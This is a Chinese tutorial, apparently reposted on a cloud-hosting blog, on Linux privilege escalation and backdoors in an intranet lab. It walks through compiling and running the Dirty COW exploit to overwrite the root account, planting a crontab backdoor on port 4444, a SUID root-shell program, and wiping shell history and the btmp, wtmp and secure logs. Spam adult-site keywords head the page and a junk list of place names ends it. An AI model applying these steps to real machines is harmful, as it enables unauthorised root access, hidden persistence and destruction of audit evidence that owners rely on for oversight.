中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

內網滲透 之如何使用提權和后門植入

發布時間:2021-10-23 18:04:48 來源:億速云 閱讀:216 作者:iii 欄目:編程語言

本篇內容介紹了“內網滲透 之如何使用提權和后門植入”的有關知識,在實際案例的操作過程中,不少人都會遇到這樣的困境,接下來就讓小編帶領大家學習一下如何處理這些情況吧!希望大家仔細閱讀,能夠學有所成!

linux提權和后門植入

1. 臟牛漏洞復現

(1) 去網頁上把dirty.c中的代碼復下來,制然后touch(創建)一個.c文件,vi或者vim打開將代碼復制進去保存

(不能在kali上直接wget下載https://github.com/FireFart/dirtycow/blob/master/dirty.c,因為這樣會把整個網頁下載下來(親測))

內網滲透 之如何使用提權和后門植入

內網滲透 之如何使用提權和后門植入

(2) 進入shell然后從kali開的apache服務上下載

內網滲透 之如何使用提權和后門植入

(3) 編譯1.c文件

內網滲透 之如何使用提權和后門植入

gcc -pthread 1.c -o dirty -lcrypt                編譯.c文件

(4) 執行文件

內網滲透 之如何使用提權和后門植入

內網滲透 之如何使用提權和后門植入

./dirty | ./dirty 自定義密碼

測試完記得將備份的password.bak(原)覆蓋過去

(5) 切換改寫過后的管理員賬戶(成功提權)

內網滲透 之如何使用提權和后門植入

2. crontab計劃任務

(1) vim /etc/crontab進入編輯(前提是有管理員權限)

內網滲透 之如何使用提權和后門植入

(2) 重啟后4444端口在運行

(3) 可以控制

內網滲透 之如何使用提權和后門植入

3. suid提權(前提成功提權過一次,相當于留提權留后門)

(1) 創建一個suid.c的文件(由于靶機太難編輯了,所以我kali編輯完后用wget下載過去)

內網滲透 之如何使用提權和后門植入

內網滲透 之如何使用提權和后門植入

#include<stdlib.h> main(){setuid(0);system(“/bin/bash”);}

(2) 用wget下載suid

(3) gcc編譯suid.c文件

內網滲透 之如何使用提權和后門植入

gcc suid.c -o suid

(4) 修改suid的權限(將文件賦予執行該文件的以管理員身份執行改文件)

(5) 重啟后的靶機可以直接執行./suid進行提權(不需要密碼)

內網滲透 之如何使用提權和后門植入

4. linux痕跡清除

(1) 僅清理當前用戶: history -c

內網滲透 之如何使用提權和后門植入

(2) 使系統不再保存命令記錄:vi /etc/profile,找到HISTSIZE這個值,修改為0

內網滲透 之如何使用提權和后門植入

刪除記錄

(3) 刪除登錄失敗記錄:echo > /var/log/btmp

(4) 刪除登錄成功記錄:echo > /var/log/wtmp (此時執行last命令就會發現沒有記錄)

內網滲透 之如何使用提權和后門植入

(5) 刪除日志記錄:echo > /var/log/secure

“內網滲透 之如何使用提權和后門植入”的內容就介紹到這里了,感謝大家的閱讀。如果想了解更多行業相關的知識可以關注億速云網站,小編將為大家輸出更多高質量的實用文章!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

泾源县| 赫章县| 茌平县| 莱芜市| 信阳市| 大庆市| 富蕴县| 巴东县| 昌黎县| 邹城市| 嘉兴市| 灵宝市| 宝鸡市| 三都| 莫力| 河曲县| 吕梁市| 扬州市| 横峰县| 邵武市| 黄石市| 杨浦区| 青阳县| 界首市| 南皮县| 宁城县| 葵青区| 盐源县| 芦溪县| 屯留县| 长顺县| 沁阳市| 故城县| 高安市| 文安县| 岑溪市| 彰化县| 修武县| 金川县| 隆林| 祁门县|